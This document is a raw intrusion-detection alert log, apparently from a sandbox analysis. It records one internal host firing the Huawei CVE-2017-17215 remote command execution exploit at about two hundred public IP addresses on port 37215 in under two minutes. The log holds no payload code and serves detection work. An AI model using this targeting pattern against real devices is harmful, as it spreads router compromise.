                                                    07/10/24-08:26:55.302955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3321637215192.168.2.1444.251.131.2
                                                    07/10/24-08:27:19.322147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6055037215192.168.2.1441.102.151.156
                                                    07/10/24-08:27:03.014549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3813037215192.168.2.1441.195.13.5
                                                    07/10/24-08:27:14.846155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5630037215192.168.2.14197.95.128.84
                                                    07/10/24-08:26:25.430533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5327037215192.168.2.1441.187.94.137
                                                    07/10/24-08:26:36.330025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3709837215192.168.2.1441.136.46.85
                                                    07/10/24-08:26:29.876812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4605637215192.168.2.14197.4.223.188
                                                    07/10/24-08:26:13.820956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6097637215192.168.2.14203.8.230.173
                                                    07/10/24-08:27:23.952903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3807437215192.168.2.14191.124.102.208
                                                    07/10/24-08:27:24.942131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3908237215192.168.2.1441.170.220.113
                                                    07/10/24-08:27:32.517420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3702437215192.168.2.14157.145.152.9
                                                    07/10/24-08:27:03.004386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5622637215192.168.2.1441.230.177.25
                                                    07/10/24-08:27:27.159131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4988637215192.168.2.1441.32.5.208
                                                    07/10/24-08:26:55.380846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5024837215192.168.2.14113.156.69.94
                                                    07/10/24-08:27:23.929861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3680637215192.168.2.14202.29.165.6
                                                    07/10/24-08:26:43.692447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3528237215192.168.2.14157.127.118.7
                                                    07/10/24-08:26:34.190814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5624437215192.168.2.1441.133.40.190
                                                    07/10/24-08:27:02.914738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5828037215192.168.2.1441.21.124.50
                                                    07/10/24-08:27:31.559678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3298037215192.168.2.14195.74.184.176
                                                    07/10/24-08:27:07.322486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6071437215192.168.2.14157.157.140.175
                                                    07/10/24-08:26:28.843538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469037215192.168.2.1441.211.49.77
                                                    07/10/24-08:27:20.407027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3477837215192.168.2.1441.68.186.241
                                                    07/10/24-08:27:20.517321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5602237215192.168.2.14157.178.131.207
                                                    07/10/24-08:27:23.959862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3512837215192.168.2.14197.249.37.86
                                                    07/10/24-08:26:25.520739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5853837215192.168.2.14197.88.213.1
                                                    07/10/24-08:26:23.348591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4536237215192.168.2.14197.169.149.6
                                                    07/10/24-08:26:20.144044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4118037215192.168.2.14197.108.124.112
                                                    07/10/24-08:26:23.308313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239637215192.168.2.14141.252.167.15
                                                    07/10/24-08:26:41.329184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4161437215192.168.2.14197.128.20.88
                                                    07/10/24-08:26:57.587919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4502437215192.168.2.14157.209.93.114
                                                    07/10/24-08:26:59.631449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3459037215192.168.2.1441.68.226.32
                                                    07/10/24-08:27:34.119978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4316637215192.168.2.1441.54.212.173
                                                    07/10/24-08:26:38.568702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3925637215192.168.2.1441.245.38.90
                                                    07/10/24-08:26:15.854243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3497037215192.168.2.14155.198.173.173
                                                    07/10/24-08:27:13.905585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4991437215192.168.2.14157.194.235.223
                                                    07/10/24-08:27:02.736564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4909437215192.168.2.14197.43.100.174
                                                    07/10/24-08:26:34.238567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606837215192.168.2.14157.124.145.175
                                                    07/10/24-08:26:33.237897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4853237215192.168.2.1441.90.102.38
                                                    07/10/24-08:27:24.937282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5225637215192.168.2.14201.244.144.48
                                                    07/10/24-08:26:11.162688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3534637215192.168.2.14197.202.196.183
                                                    07/10/24-08:27:30.492853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131237215192.168.2.14197.204.168.242
                                                    07/10/24-08:27:23.917453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268837215192.168.2.1441.184.165.239
                                                    07/10/24-08:27:27.058367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5684637215192.168.2.1441.223.178.145
                                                    07/10/24-08:27:22.849786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4969237215192.168.2.14197.191.95.66
                                                    07/10/24-08:27:34.119977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4331037215192.168.2.14157.66.211.108
                                                    07/10/24-08:26:31.091003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3365237215192.168.2.1462.164.31.153
                                                    07/10/24-08:27:22.800658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4525637215192.168.2.14157.173.182.232
                                                    07/10/24-08:26:42.384643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4397637215192.168.2.14197.23.223.79
                                                    07/10/24-08:26:49.802852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4379437215192.168.2.14157.219.127.32
                                                    07/10/24-08:27:27.065687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5430837215192.168.2.14157.66.221.64
                                                    07/10/24-08:27:27.041240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3349437215192.168.2.14197.228.30.145
                                                    07/10/24-08:26:15.821130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3445437215192.168.2.14157.168.218.96
                                                    07/10/24-08:27:13.985785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968837215192.168.2.1441.45.0.73
                                                    07/10/24-08:26:26.529010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4033037215192.168.2.14157.202.40.202
                                                    07/10/24-08:27:02.766383TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4114037215192.168.2.14157.232.76.11
                                                    07/10/24-08:26:34.267264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3344437215192.168.2.14157.93.39.24
                                                    07/10/24-08:27:08.429606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5473837215192.168.2.1441.56.226.233
                                                    07/10/24-08:26:49.866292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4989237215192.168.2.14197.104.200.241
                                                    07/10/24-08:27:03.012569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3439837215192.168.2.14157.164.140.66
                                                    07/10/24-08:26:41.281691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5568637215192.168.2.14202.224.83.21
                                                    07/10/24-08:26:57.662909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5850237215192.168.2.1441.27.12.80
                                                    07/10/24-08:26:33.228376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5501837215192.168.2.14117.37.50.38
                                                    07/10/24-08:27:02.957344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3806637215192.168.2.1441.78.24.105
                                                    07/10/24-08:26:23.342847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5028437215192.168.2.1441.134.73.129
                                                    07/10/24-08:27:05.156857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3669237215192.168.2.1441.197.108.32
                                                    07/10/24-08:27:07.272369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4794637215192.168.2.14105.24.7.84
                                                    07/10/24-08:26:11.616592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654037215192.168.2.14157.158.167.175
                                                    07/10/24-08:26:28.855166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576837215192.168.2.1441.154.38.47
                                                    07/10/24-08:27:24.976996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5984237215192.168.2.1441.118.203.44
                                                    07/10/24-08:26:31.105157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041037215192.168.2.14176.89.172.239
                                                    07/10/24-08:26:43.662238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5647237215192.168.2.1441.147.148.104
                                                    07/10/24-08:27:02.683059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5535837215192.168.2.14202.148.70.100
                                                    07/10/24-08:27:19.329520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5121237215192.168.2.14197.119.234.73
                                                    07/10/24-08:26:14.623389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5496437215192.168.2.1441.79.104.100
                                                    07/10/24-08:26:45.668696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5691237215192.168.2.14112.246.235.174
                                                    07/10/24-08:26:48.030599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4358837215192.168.2.14204.147.71.213
                                                    07/10/24-08:26:33.204565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3781637215192.168.2.1441.15.148.104
                                                    07/10/24-08:26:48.009015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3787237215192.168.2.14157.10.190.138
                                                    07/10/24-08:27:08.443161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5418237215192.168.2.14216.190.248.205
                                                    07/10/24-08:27:02.823604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4430437215192.168.2.1441.161.241.236
                                                    07/10/24-08:27:22.909155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5586037215192.168.2.1441.189.213.6
                                                    07/10/24-08:27:28.064237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491637215192.168.2.1441.180.77.213
                                                    07/10/24-08:27:03.005959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4855837215192.168.2.1441.196.45.30
                                                    07/10/24-08:27:30.489960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238637215192.168.2.14157.142.11.132
                                                    07/10/24-08:27:31.559678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5487837215192.168.2.1441.61.52.19
                                                    07/10/24-08:26:41.493980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3520237215192.168.2.14157.36.66.20
                                                    07/10/24-08:27:30.492988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5288837215192.168.2.14135.75.198.53
                                                    07/10/24-08:26:43.651509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5626437215192.168.2.1441.97.109.169
                                                    07/10/24-08:26:51.994858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5602837215192.168.2.14197.41.121.215
                                                    07/10/24-08:26:28.851578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5621437215192.168.2.14197.222.13.218
                                                    07/10/24-08:26:59.842336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4466637215192.168.2.14184.92.54.176
                                                    07/10/24-08:26:15.865384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5136237215192.168.2.1438.174.111.133
                                                    07/10/24-08:26:55.402218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4436237215192.168.2.14197.108.77.37
                                                    07/10/24-08:27:32.617862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4187037215192.168.2.14157.188.35.241
                                                    07/10/24-08:26:43.825232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300637215192.168.2.1499.140.102.41
                                                    07/10/24-08:27:27.047085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3811837215192.168.2.14157.222.199.131
                                                    07/10/24-08:27:05.173254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4240837215192.168.2.14197.101.235.78
                                                    07/10/24-08:27:13.968872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5018037215192.168.2.14197.50.201.74
                                                    07/10/24-08:27:28.035789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5556637215192.168.2.1472.184.130.164
                                                    07/10/24-08:26:11.515287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5707037215192.168.2.14197.159.156.241
                                                    07/10/24-08:26:55.436207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4178437215192.168.2.14157.24.1.101
                                                    07/10/24-08:27:28.146093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3961637215192.168.2.14157.97.178.123
                                                    07/10/24-08:27:22.918305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5022037215192.168.2.148.28.43.15
                                                    07/10/24-08:27:11.540187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3742437215192.168.2.1439.230.255.67
                                                    07/10/24-08:27:13.862635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3405837215192.168.2.1474.229.79.163
                                                    07/10/24-08:26:49.836491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3659437215192.168.2.1441.84.146.121
                                                    07/10/24-08:27:17.005149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3991437215192.168.2.14135.105.59.26
                                                    07/10/24-08:26:25.430208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309237215192.168.2.14157.63.114.196
                                                    07/10/24-08:27:30.469878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4482037215192.168.2.14113.107.101.20
                                                    07/10/24-08:26:33.244914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031637215192.168.2.14197.54.152.189
                                                    07/10/24-08:26:45.689039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5549637215192.168.2.14197.193.248.251
                                                    07/10/24-08:26:49.911727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586837215192.168.2.14157.75.189.49
                                                    07/10/24-08:26:26.617317TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4080237215192.168.2.14157.29.179.29
                                                    07/10/24-08:27:22.938789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3967237215192.168.2.14197.233.117.141
                                                    07/10/24-08:27:05.104096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4972037215192.168.2.1441.15.99.119
                                                    07/10/24-08:27:02.696239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5091837215192.168.2.14157.161.162.197
                                                    07/10/24-08:26:49.775656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5422037215192.168.2.1441.156.123.175
                                                    07/10/24-08:26:49.819720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3883837215192.168.2.14197.213.78.112
                                                    07/10/24-08:26:59.860909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3578237215192.168.2.14197.95.56.92
                                                    07/10/24-08:26:42.345692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362037215192.168.2.14197.8.226.12
                                                    07/10/24-08:26:13.646221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973037215192.168.2.14177.220.89.193
                                                    07/10/24-08:26:59.879798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3603837215192.168.2.14223.213.23.42
                                                    07/10/24-08:26:43.813541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5269237215192.168.2.1423.74.120.223
                                                    07/10/24-08:26:43.814052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3612237215192.168.2.1441.3.41.153
                                                    07/10/24-08:26:15.854243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4466837215192.168.2.14219.23.22.221
                                                    07/10/24-08:26:43.913134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3419037215192.168.2.14197.219.133.116
                                                    07/10/24-08:27:10.609289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491637215192.168.2.14163.244.219.24
                                                    07/10/24-08:27:22.835160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3882837215192.168.2.1441.213.19.138
                                                    07/10/24-08:27:33.734859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3592837215192.168.2.14197.199.11.236
                                                    07/10/24-08:26:22.282645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845637215192.168.2.1441.149.133.240
                                                    07/10/24-08:27:30.414315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5181437215192.168.2.1441.38.149.60
                                                    07/10/24-08:26:36.341806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825837215192.168.2.14157.223.167.67
                                                    07/10/24-08:27:33.897517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5584437215192.168.2.1467.125.96.101
                                                    07/10/24-08:26:59.665710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3298637215192.168.2.1441.209.23.57
                                                    07/10/24-08:26:31.099598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4971037215192.168.2.1441.95.77.144
                                                    07/10/24-08:27:02.838823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5216637215192.168.2.14197.30.164.67
                                                    07/10/24-08:26:13.828221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4693237215192.168.2.1441.80.239.53
                                                    07/10/24-08:26:22.222070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810037215192.168.2.14171.252.180.64
                                                    07/10/24-08:26:23.328619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717437215192.168.2.1441.41.219.188
                                                    07/10/24-08:26:53.193808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3581237215192.168.2.14197.135.241.134
                                                    07/10/24-08:26:26.573504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886837215192.168.2.1441.79.184.5
                                                    07/10/24-08:27:11.534381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4797037215192.168.2.1491.250.171.217
                                                    07/10/24-08:27:07.361237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4916837215192.168.2.14157.233.120.78
                                                    07/10/24-08:27:17.072701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4868037215192.168.2.14157.9.218.117
                                                    07/10/24-08:26:45.583882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5146837215192.168.2.1441.68.4.112
                                                    07/10/24-08:27:23.967998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4602037215192.168.2.1441.120.130.143
                                                    07/10/24-08:27:22.810849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5744037215192.168.2.14157.24.227.58
                                                    07/10/24-08:26:43.524058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823037215192.168.2.1441.132.62.143
                                                    07/10/24-08:26:11.610519TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428637215192.168.2.1441.254.114.42
                                                    07/10/24-08:27:22.853545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4798037215192.168.2.14197.14.92.130
                                                    07/10/24-08:27:24.989466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4168037215192.168.2.14197.144.168.184
                                                    07/10/24-08:26:43.814052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3607637215192.168.2.14197.112.77.162
                                                    07/10/24-08:26:43.914559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4473637215192.168.2.14157.240.13.176
                                                    07/10/24-08:27:05.239368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3989237215192.168.2.14178.196.63.42
                                                    07/10/24-08:26:28.741388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5663637215192.168.2.1441.196.245.116
                                                    07/10/24-08:26:29.879132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5318237215192.168.2.1441.76.123.11
                                                    07/10/24-08:26:42.367080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4317437215192.168.2.1443.253.213.147
                                                    07/10/24-08:26:42.366312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4418837215192.168.2.14157.196.17.173
                                                    07/10/24-08:26:28.912225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511837215192.168.2.14197.100.216.34
                                                    07/10/24-08:26:28.743244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4476237215192.168.2.1441.207.221.78
                                                    07/10/24-08:26:28.893225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5759837215192.168.2.14157.67.61.82
                                                    07/10/24-08:27:28.139663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4504637215192.168.2.14157.124.222.37
                                                    07/10/24-08:26:59.812125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3796837215192.168.2.1484.133.99.35
                                                    07/10/24-08:26:31.081032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4770837215192.168.2.14157.30.185.223
                                                    07/10/24-08:27:10.641712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975837215192.168.2.1441.252.72.131
                                                    07/10/24-08:26:43.713774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5455637215192.168.2.14129.162.77.45
                                                    07/10/24-08:26:14.777046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606637215192.168.2.1441.224.219.120
                                                    07/10/24-08:26:28.647124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4392237215192.168.2.1486.49.99.142
                                                    07/10/24-08:27:23.499663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3834037215192.168.2.14197.92.105.144
                                                    07/10/24-08:26:28.651125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3494037215192.168.2.14197.21.187.166
                                                    07/10/24-08:26:28.644111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5241637215192.168.2.14157.74.56.227
                                                    07/10/24-08:26:31.074036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3687437215192.168.2.14197.71.162.11
                                                    07/10/24-08:27:13.978919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3479037215192.168.2.14153.250.115.20
                                                    07/10/24-08:26:48.029902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233637215192.168.2.1441.157.166.75
                                                    07/10/24-08:27:23.490419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3599637215192.168.2.14157.254.197.154
                                                    07/10/24-08:26:42.447281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5986637215192.168.2.1441.33.138.232
                                                    07/10/24-08:27:31.478959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4789637215192.168.2.14197.14.226.175
                                                    07/10/24-08:27:30.510691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4401637215192.168.2.14157.111.4.255
                                                    07/10/24-08:26:28.792131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4317437215192.168.2.14197.128.149.161
                                                    07/10/24-08:27:27.063250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5357437215192.168.2.14157.232.36.64
                                                    07/10/24-08:26:33.251804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6026837215192.168.2.14157.91.0.43
                                                    07/10/24-08:27:17.035862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4783637215192.168.2.14157.132.37.106
                                                    07/10/24-08:27:33.719591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3524037215192.168.2.14157.249.217.180
                                                    07/10/24-08:27:14.837322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3685437215192.168.2.14147.122.48.30
                                                    07/10/24-08:27:22.800658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5328037215192.168.2.148.91.152.237
                                                    07/10/24-08:26:25.507249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4167037215192.168.2.1441.21.235.28
